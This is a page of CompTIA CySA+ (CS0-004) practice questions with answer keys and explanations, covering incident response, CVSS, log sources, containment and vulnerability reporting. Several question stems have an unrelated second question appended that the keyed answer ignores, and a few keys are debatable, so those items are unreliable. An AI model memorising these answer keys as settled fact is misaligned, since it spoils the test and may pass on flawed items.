B.Mark the vulnerability as a false positive
C.Immediately shut down the system
D.Apply compensating controls and document the risk
AnswerD

When a permanent patch cannot be immediately deployed, implementing compensating controls—such as restricting network access via firewall rules or enabling specific intrusion prevention signatures—actively reduces the risk of exploitation. Documenting this risk and the associated temporary mitigations ensures compliance, maintains operational visibility, and establishes a clear path toward eventual remediation.

Why this answer

The analyst should document the finding and apply compensating controls, such as network segmentation or firewall rules, to mitigate risk until a patch can be applied.

206
MCQhard

An organization's incident response team is handling a ransomware incident where critical servers have been encrypted. The team has identified the ransomware variant and determined that decryption is not possible. Which of the following is the BEST post-incident activity to prevent recurrence?

A.Increase the frequency of vulnerability scans.
B.Share IOCs with the industry ISAC.
C.Conduct a root cause analysis to determine the initial infection vector.
D.Reimage all affected servers from backups.
AnswerC

Conducting a root cause analysis (RCA) is the critical post-incident activity required to pinpoint the exact initial infection vector, such as a phishing email, compromised credential, or unpatched edge device. Identifying this entry point allows the incident response team to implement targeted, permanent security controls to prevent the same exploit from being used in future attacks.

Why this answer

A root cause analysis identifies how the ransomware actually entered — phishing email, exposed RDP, unpatched VPN, supply chain — which is the only way to close the specific gap that allowed the incident. Without knowing the initial infection vector, any remediation is guesswork and the same attack can recur. Post-incident activities in NIST SP 800-61 and CompTIA's IR lifecycle explicitly call for lessons-learned/root-cause work to drive preventive controls.

Exam trap

CS0-004 often tests the confusion between recovery actions (reimage, restore) and preventive actions (RCA, control changes), tempting candidates to pick the most visible operational step instead of the one that stops recurrence.

How to eliminate wrong answers

Option A is wrong because increasing scan frequency is a generic hardening action that does not address the specific entry path the attacker used; it may not even cover the exploited vector (e.g., a phishing payload). Option B is wrong because sharing IOCs with an ISAC is a threat-intelligence contribution that helps the community but does nothing to prevent recurrence inside this organization. Option D is wrong because reimaging from backups is a recovery action, not a preventive one — it restores service but leaves the original vulnerability in place.

207
MCQhard

After a data breach involving customer PII, the incident response team has contained the incident and eradicated the malware. What is the NEXT step in the remediation process?

A.Close the vulnerability that was exploited.
B.Restore systems from clean backups.
C.Conduct a root cause analysis.
D.Notify all affected customers.
AnswerA

During the eradication phase of incident response, the primary objective is to eliminate the root components of the threat. Patching or closing the exploited vulnerability must occur before system restoration to prevent attackers from immediately re-entering the network. This ensures the environment is secure before returning to normal operations.

Why this answer

After containment and eradication, the next step in the remediation process is to close the vulnerability that was exploited. This prevents the attacker from re-entering through the same vector. Conducting a root cause analysis (C) is part of the post-incident review, not the immediate next step.

Notifying affected customers (D) is a legal/compliance step that occurs later in the process. Restoring systems from clean backups (B) is part of the recovery phase, which typically occurs after closing the vulnerability.

208
MCQeasy

During a vulnerability scan, a security analyst identifies a critical vulnerability with a CVSS v3.1 base score of 9.8. The CVSS vector is AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Which component of this vector indicates that the vulnerability can be exploited without any user interaction?

A.AC:L
B.AV:N
C.PR:N
D.UI:N
AnswerD

The UI:N metric stands for User Interaction: None, which explicitly confirms that the vulnerability can be exploited without any active participation or assistance from a local user. This means the attack can be executed entirely out-of-band and automatically, making it highly dangerous compared to vulnerabilities requiring social engineering or user actions like clicking a link.

Why this answer

The UI (User Interaction) metric in the CVSS vector is set to N (None), meaning no user action is required for exploitation.

209
MCQmedium

A security analyst discovers a critical vulnerability in a web application that stores customer payment data. The analyst needs to report this to the CISO. Which type of report is most appropriate for communicating the business impact of this vulnerability?

A.Compliance report showing PCI DSS control status
B.Technical vulnerability report with CVSS scores and proof of concept
C.Incident report detailing steps to exploit
D.Executive dashboard highlighting financial risk and regulatory penalties
AnswerD

A CISO operates at the executive level and must translate technical vulnerabilities into business risk to allocate resources and make strategic decisions. An executive dashboard that quantifies the vulnerability in terms of potential financial loss, operational downtime, and regulatory non-compliance penalties provides the exact high-level business context required for executive leadership.

Why this answer

An executive dashboard provides high-level metrics and business impact summaries suitable for non-technical stakeholders like the CISO.

210
MCQeasy

A SIEM alert is generated for a user who logged into a workstation at 2:00 AM, which is outside their normal working hours. The user's manager confirms the user was on call and had legitimate reason to log in. How should the analyst classify this alert?

A.False positive
B.False negative
C.True positive
D.True negative
AnswerA

This scenario represents a false positive because the SIEM generated an alert for a standard, benign user login. The detection rule incorrectly flagged normal, authorized workstation access as a potential security incident, requiring analysts to investigate and tune the rule to reduce noise.

Why this answer

The alert is a false positive because the activity is legitimate despite being outside normal hours.

211
MCQmedium

An analyst is examining a disk image acquired from a compromised Linux server. The analyst needs to verify that the image is an exact bit-for-bit copy of the original drive. Which forensic sound procedure should the analyst perform?

A.Compare the hash of the image to the hash of the original drive.
B.Use a write blocker when acquiring the image.
C.Mount the image in read-only mode.
D.Analyze the image with a hex editor.
AnswerA

To verify the integrity of a forensic acquisition, the analyst must calculate a cryptographic hash (such as MD5, SHA-1, or SHA-256) of both the source media and the destination image. Matching hash values mathematically prove that no data was altered, added, or lost during the imaging process, establishing a verifiable chain of custody.

Why this answer

Hash verification ensures the image matches the original by comparing cryptographic hashes (e.g., MD5, SHA-256) generated during acquisition.

212
MCQmedium

During a containment phase of an incident response, the team needs to prevent an infected host from communicating with a command-and-control server. The host is a critical database server that cannot be taken offline. Which of the following containment strategies is most appropriate?

A.Pull the network cable
B.Disable the database service
C.Isolate the host by VLAN
D.Block the C2 IP at the firewall
AnswerD

Blocking the command-and-control (C2) IP address at the firewall is a precise and effective containment strategy that minimizes impact on legitimate operations. This action specifically prevents the compromised host from communicating with the attacker's infrastructure, thereby stopping further commands or data exfiltration, while allowing all other legitimate database traffic to continue uninterrupted. This targeted approach ensures business continuity while actively mitigating the threat.

Why this answer

Blocking the C2 IP at the firewall is the most appropriate strategy because it disrupts the command-and-control communication without taking the critical database server offline. This network-layer containment allows the host to continue serving its database functions while preventing outbound traffic to the malicious IP, aligning with the need for a surgical containment approach.

Exam trap

CompTIA often tests the distinction between network-level containment (firewall block) and host-level isolation (VLAN or cable pull), trapping candidates who think VLAN isolation is always non-disruptive when it often requires port reconfiguration that can drop active sessions.

How to eliminate wrong answers

Option A is wrong because pulling the network cable completely disconnects the host from the network, which would take the critical database server offline and violate the requirement that it cannot be taken offline. Option B is wrong because disabling the database service stops the server's primary function, effectively taking it offline, which contradicts the scenario's constraint. Option C is wrong because isolating the host by VLAN typically requires reconfiguring the switch port or moving the host to a separate VLAN, which can disrupt network connectivity and may not be feasible without taking the host offline or causing significant service interruption.

213
MCQmedium

An analyst is reviewing a Nessus scan report and sees a plugin result that indicates a web application is vulnerable to SQL injection. The plugin output includes the payload used and the database error message. Which OWASP Top 10 category does this vulnerability belong to?

A.A03:2021 – Injection
B.A07:2021 – Identification and Authentication Failures
C.A09:2021 – Security Logging and Monitoring Failures
D.A01:2021 – Broken Access Control
AnswerA

SQL injection lets an attacker insert untrusted input into a database query so it is executed as code rather than data, which is the exact definition of the OWASP Injection category and explains the payload and error message in the output.

Why this answer

SQL injection is a classic injection flaw where untrusted input is interpreted as code by the database. In the OWASP Top 10 2021, SQL injection falls under A03:2021 – Injection, which encompasses SQL, NoSQL, OS command, ORM, and LDAP injection. The plugin output showing a payload and database error confirms injection.

Exam trap

The trap is misclassifying SQL injection under Broken Access Control or Authentication Failures — candidates see 'database' or 'login' and pick the wrong category, but SQLi is definitively A03:2021 – Injection.

How to eliminate wrong answers

Option B is wrong because A07:2021 – Identification and Authentication Failures covers weaknesses in authentication and session management (e.g., credential stuffing, weak passwords), not injection flaws. Option C is wrong because A09:2021 – Security Logging and Monitoring Failures covers insufficient logging, detection, and incident response, not the injection vulnerability itself. Option D is wrong because A01:2021 – Broken Access Control covers authorization flaws like IDOR and privilege escalation, not code injection.

214
MCQeasy

Which log source would best help detect an attacker using a domain generation algorithm (DGA) to communicate with a command and control server?

A.Firewall logs
B.Cloud audit logs
C.DNS query logs
D.Authentication logs
AnswerC

DNS query logs record every domain resolution request made by internal hosts, capturing the specific high-entropy, randomized domain names characteristic of Domain Generation Algorithms (DGAs). Analyzing these logs allows security analysts to detect anomalous NXDOMAIN spikes and identify compromised systems attempting to contact dynamic command-and-control servers.

Why this answer

DNS query logs are the best source because DGA malware generates many pseudo-random domain names and attempts to resolve them to locate its C2 server. These queries appear as high volumes of unique, algorithmically generated domains (e.g., 'ajk3n4lkj.com') that often result in NXDOMAIN responses. Firewall logs only show IP connections, not the domain names, and cloud audit logs track API activity, not DNS.

Authentication logs record login events, unrelated to DGA traffic.

Exam trap

CS0-004 often tests the misconception that firewall logs are sufficient for detecting C2, but DGA communication is best identified at the DNS layer before any IP connection is made.

How to eliminate wrong answers

Option A is wrong because firewall logs capture IP addresses and ports, not domain names; DGA domains must be resolved to IPs first, so the DNS query is the earlier and more direct indicator. Option B is wrong because cloud audit logs record API calls and resource changes in cloud environments, not DNS resolution attempts from endpoints. Option D is wrong because authentication logs track user login successes/failures and privilege changes, which are irrelevant to DGA-based C2 communication.

215
MCQmedium

During dynamic analysis of a malware sample in a sandbox, the analyst observes that the malware attempts to connect to an IP address 198.51.100.23 and modifies the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which IOC type is the IP address an example of?

A.Network indicator
B.File hash
C.Email indicator
D.Domain name
AnswerA

During dynamic analysis in a sandbox, observing a malware sample attempt to establish outbound connections to specific external IP addresses provides critical network indicators. These IP addresses serve as network-based indicators of compromise (IOCs) that security analysts can use to configure firewalls, intrusion detection systems, and blocklists to prevent further communication with command-and-control (C2) servers.

Why this answer

IP addresses are a common type of indicator of compromise, representing network-based IOCs that can be used for detection.

216
MCQmedium

A vulnerability programme wants to show whether critical findings are fixed within policy timelines. Which report is best? If the primary audience is legal/privacy stakeholder, which content choice is most appropriate?

A.A list of all closed tickets with no dates
B.SLA compliance by severity, asset owner, and business unit
C.A vendor price comparison
D.A report sorted only by scanner plugin ID
AnswerB

SLA compliance by severity, asset owner and business unit directly evidences whether critical findings were remediated inside policy timelines, satisfying the programme's reporting goal. Grouping by owner and business unit also gives legal and privacy stakeholders accountability context without exposing raw vulnerability detail.

Why this answer

B is correct because SLA compliance by severity, asset owner, and business unit directly maps to the requirement of showing whether critical findings are fixed within policy timelines. This report filters by severity (e.g., critical), includes time-bound metrics (SLA compliance), and can be broken down by asset owner and business unit to demonstrate accountability and policy adherence. For legal/privacy stakeholders, this content provides auditable evidence of remediation timelines, which is essential for regulatory compliance and risk management.

Exam trap

The CS0-004 exam often tests the misconception that any list of closed tickets is sufficient for compliance reporting, but the trap here is that without date fields and severity-based SLA filtering, you cannot prove policy adherence—candidates overlook the need for time-bound, severity-specific metrics in legal/privacy contexts.

How to eliminate wrong answers

Option A is wrong because a list of all closed tickets with no dates lacks any temporal context, making it impossible to determine whether critical findings were fixed within policy timelines; it provides no SLA compliance or severity filtering. Option C is wrong because a vendor price comparison is irrelevant to vulnerability remediation timelines and policy compliance; it addresses procurement or cost analysis, not security operations or legal/privacy reporting needs.

217
Multi-Selecthard

A Kubernetes audit alert shows a service account creating privileged pods. Which checks are most relevant? (Choose two.)

Select 2 answers
A.The number of comments in application code
B.User profile pictures in the HR system
C.Pod spec fields such as privileged mode, hostPath, and hostNetwork
D.Recent role binding or cluster role binding changes
AnswersC, D

Examining pod specification fields like 'privileged: true', 'hostPath', and 'hostNetwork' is critical because these parameters allow containers to bypass isolation boundaries. If a compromised service account deploys a pod with these configurations, it can access the underlying host node's filesystem, network namespace, and devices, potentially leading to a full cluster takeover. Security teams must scrutinize these fields to detect container escape attempts and privilege escalation.

Why this answer

Privileged pods can bypass container security boundaries, and hostPath or hostNetwork access can lead to host-level compromise. The audit alert specifically flags a service account creating such pods, which violates the principle of least privilege and indicates a potential security incident that requires immediate investigation of the pod spec fields.

Exam trap

The CS0-004 exam often tests the ability to distinguish between operational metrics (like code comments or HR data) and security-relevant configuration fields, trapping candidates who confuse general IT audit items with Kubernetes-specific security indicators.

218
MCQeasy

Which of the following is the FIRST step in the NIST SP 800-61 incident response lifecycle?

A.Detection and Analysis
B.Post-Incident Activity
C.Preparation
D.Containment, Eradication, and Recovery
AnswerC

Preparation is the first phase in the NIST SP 800-61 incident response lifecycle, and it occurs before any incident actually happens. It entails building an incident response team, establishing communication plans, deploying necessary tooling (such as SIEM and EDR), creating playbooks, and conducting training and tabletop exercises. Without this pre-emptive groundwork, downstream phases like detection and analysis lack the required procedures and resources, making Preparation the non-negotiable starting point.

Why this answer

NIST SP 800-61 Rev. 2 defines the incident response lifecycle as four phases: Preparation; Detection and Analysis; Containment, Eradication, and Recovery; and Post-Incident Activity. Preparation is the first phase because it establishes the CSIRT, tools, communications plans, and playbooks before any incident occurs. Without preparation, later phases cannot be executed effectively.

Exam trap

CS0-004 often tests whether candidates assume Detection is first because incidents 'start' with detection—but the lifecycle begins with Preparation, the phase that makes detection possible.

How to eliminate wrong answers

Option A is wrong because Detection and Analysis is the second phase—it only happens after preparation has built the capability to detect. Option B is wrong because Post-Incident Activity is the final phase, involving lessons learned and evidence retention. Option D is wrong because Containment, Eradication, and Recovery is the third phase, executed only after an incident has been detected and analyzed.

219
MCQmedium

During a threat hunting engagement, a hunter creates a hypothesis that adversaries may be using PowerShell to perform reconnaissance via Active Directory cmdlets. The hunter decides to look for events where PowerShell loaded the ActiveDirectory module. Which of the following detection techniques is most appropriate?

A.Create a SIEM correlation rule that triggers on Event ID 4104 (PowerShell Script Block Logging)
B.Perform a packet capture to analyze PowerShell network traffic
C.Deploy a YARA rule on endpoints to scan for malicious PowerShell scripts
D.Use osquery to query running PowerShell processes
AnswerA

Script Block Logging (Event ID 4104) records the actual PowerShell code executed, so loading the ActiveDirectory module and running its cmdlets is captured verbatim. This satisfies the hypothesis by surfacing AD reconnaissance commands that module-loading events alone would miss.

Why this answer

Event ID 4104 is generated by PowerShell Script Block Logging and captures the actual script block text executed, including the commands that import and invoke Active Directory cmdlets. A SIEM correlation rule on 4104 can detect patterns like 'Import-Module ActiveDirectory' or 'Get-ADUser' that indicate AD reconnaissance. This gives the hunter visibility into the exact PowerShell code executed on endpoints, which is the most direct evidence of the hypothesized behavior.

Exam trap

CS0-004 often tests the misconception that network-level tools (packet capture) or file-scanning tools (YARA) can detect in-memory PowerShell activity, when only script block or module logging provides that visibility.

How to eliminate wrong answers

Option B is wrong because packet capture only reveals network-level artifacts (LDAP queries, Kerberos traffic) and cannot confirm that PowerShell loaded the ActiveDirectory module on the host. Option C is wrong because YARA rules scan files on disk for known malicious patterns; they do not detect in-memory PowerShell module loading or script block execution. Option D is wrong because osquery can enumerate running processes but cannot see which PowerShell modules were loaded or what cmdlets were invoked within a process.

220
MCQmedium

During a post-incident review, the incident response team identifies that the mean time to detect (MTTD) for a recent breach was 14 days, while the mean time to respond (MTTR) was 6 hours. Which metric should the team prioritize to improve in future incidents?

A.Percentage of incidents containing malware
B.Number of incidents per week
C.Mean time to respond (MTTR)
D.Mean time to detect (MTTD)
AnswerD

Mean time to detect (MTTD) measures the duration between the initial security compromise and the moment security analysts identify the threat. Minimizing this metric is crucial because reducing dwell time directly limits an attacker's lateral movement and data exfiltration opportunities. By prioritizing MTTD, the organization can initiate containment protocols much earlier in the attack lifecycle, significantly mitigating overall business impact.

Why this answer

With MTTD at 14 days and MTTR at only 6 hours, detection is clearly the bottleneck — attackers had nearly two weeks of dwell time before anyone noticed. Improving MTTD (via better logging, EDR tuning, threat hunting, or SIEM correlation) will reduce attacker dwell time and blast radius far more than shaving hours off an already-fast response.

Exam trap

CS0-004 often tests whether candidates reflexively pick 'improve MTTR' as the security answer without comparing the relative magnitudes of the two metrics — here 14 days vs. 6 hours makes detection the obvious priority.

How to eliminate wrong answers

Option A is wrong because the percentage of incidents containing malware is a composition metric, not a speed metric, and does not address the 14-day detection gap. Option B is wrong because incident volume per week measures workload, not detection or response efficiency, and does not indicate where the breach lifecycle is failing. Option C is wrong because MTTR is already excellent at 6 hours; optimizing it further yields marginal gains compared to the 14-day detection delay.

221
MCQmedium

A security team is implementing configuration management for a set of Linux servers in a non-DoD environment. They want to apply a security baseline that provides a balanced approach between security and operational efficiency. Which of the following would be most appropriate?

A.CIS Level 1 Benchmark
B.OWASP Top 10
C.CIS Level 2 Benchmark
D.STIG for Linux
AnswerA

The CIS Level 1 Benchmark is designed to deliver a basic, essential security posture that can be rapidly implemented across systems with minimal disruption to business operations. It focuses on disabling unnecessary services, configuring basic logging, and enforcing standard access controls without breaking application functionality. This makes it the ideal starting point for general enterprise configuration management.

Why this answer

CIS Benchmarks offer two levels: Level 1 is intended for environments where usability is still a priority, and Level 2 is for high-security environments. For a non-DoD environment, CIS Level 1 is appropriate.

222
MCQmedium

A cybersecurity analyst needs to communicate the risk of a newly discovered vulnerability in a legacy system to the executive leadership. Which approach best translates the technical risk into business risk?

A.Explain the vulnerability's potential impact on revenue, customer trust, and compliance penalties
B.Provide the CVSS score and technical exploit details
C.Recommend immediate patching without further justification
D.Describe the attack vector and required privileges
AnswerA

This approach is correct because it reframes a purely technical finding in terms executives already use to make decisions: revenue at risk, reputational damage from lost customer trust, and quantifiable regulatory fines. Framing risk this way lets leadership weigh remediation cost against concrete business consequences instead of abstract technical severity.

Why this answer

Executives care about business impact. Relating the vulnerability to potential financial loss, reputational damage, or regulatory penalties is the most effective way to communicate risk.

223
MCQmedium

A business unit accepts the risk of delaying a patch because downtime would breach a contractual deadline. What should be updated? For stakeholder management, Which documentation or approval is required to keep the programme defensible?

A.The risk register with owner, justification, expiry date, and compensating controls
B.The firewall vendor invoice
C.The incident containment playbook only
D.The phishing training completion list
AnswerA

A documented risk acceptance with a named owner, business justification, expiry date and compensating controls keeps the delayed patch defensible. This satisfies the stakeholder-management requirement by evidencing informed, time-bound approval rather than an undocumented decision to breach the contractual deadline.

Why this answer

When a business unit formally accepts the risk of delaying a patch, the risk register must be updated with the owner, justification, expiry date, and compensating controls. This documentation ensures the decision is defensible during audits or incidents, as it captures the explicit risk acceptance and the temporary controls in place until the patch is applied.

Exam trap

The CS0-004 exam often tests the misconception that any documentation (like an invoice or playbook) can substitute for the formal risk register entry required to track accepted risks and compensating controls.

How to eliminate wrong answers

Option B is wrong because a firewall vendor invoice is a procurement document, not a stakeholder management or risk acceptance record; it does not capture the rationale, owner, or compensating controls for a delayed patch. Option C is wrong because the incident containment playbook only outlines steps to respond to an active incident, not the proactive risk acceptance and compensating controls needed to keep the program defensible.

224
Multi-Selecteasy

Which TWO of the following are best practices for securing a network firewall configuration? (Choose two.)

Select 2 answers
A.Implement a default deny rule for inbound and outbound traffic
B.Apply least privilege access by restricting ports and IP addresses
C.Enable continuous monitoring of firewall logs
D.Allow all traffic by default and block specific threats
E.Use default vendor passwords for initial access
AnswersA, B

Implementing a default deny (or implicit deny) rule at the end of the firewall policy ensures that any traffic not explicitly permitted by a preceding rule is dropped. This foundational security posture prevents unauthorized inbound connections and restricts rogue outbound communications, significantly reducing the success of command-and-control (C2) channels.

Why this answer

A default deny rule for inbound and outbound traffic ensures that only explicitly permitted traffic is allowed, which is the foundation of a secure firewall configuration. This approach aligns with the principle of least privilege and prevents unauthorized access or data exfiltration by blocking all traffic that is not specifically required. Without a default deny rule, any misconfiguration or unanticipated traffic could bypass security controls.

Exam trap

CompTIA often tests the distinction between operational practices (like log monitoring) and configuration best practices, leading candidates to mistakenly select continuous monitoring as a configuration control rather than a detection control.

225
MCQeasy

A supplier provides a software product used in a regulated environment. The security team wants visibility into included libraries and versions. What should they request? For tool configuration, Which scanner or pipeline change most directly improves result quality?

A.A DNS MX record report
B.A software bill of materials
C.A building floor plan
D.A password complexity screenshot only
AnswerB

An SBOM lists software components and versions, supporting dependency risk analysis.

Why this answer

A software bill of materials (SBOM) is a formal, machine-readable inventory of all components, libraries, and versions used in a software product. In a regulated environment, an SBOM provides the security team with the visibility needed to assess vulnerabilities, track supply chain risks, and ensure compliance with standards like NIST SP 800-53 or FDA guidance. Requesting an SBOM directly addresses the need for library and version transparency.

Exam trap

The CS0-004 exam often tests the distinction between operational artifacts (like DNS records or floor plans) and security-specific artifacts (like SBOMs), trapping candidates who confuse general IT documentation with targeted vulnerability management tools.

How to eliminate wrong answers

Option A is wrong because a DNS MX record report lists mail exchange servers for a domain and has no relation to software libraries or versions; it is a network infrastructure query, not a software composition artifact. Option C is wrong because a building floor plan is a physical security document showing facility layouts and has no relevance to software component visibility or vulnerability management.

Page 2

Page 3 of 10

Page 4

All pages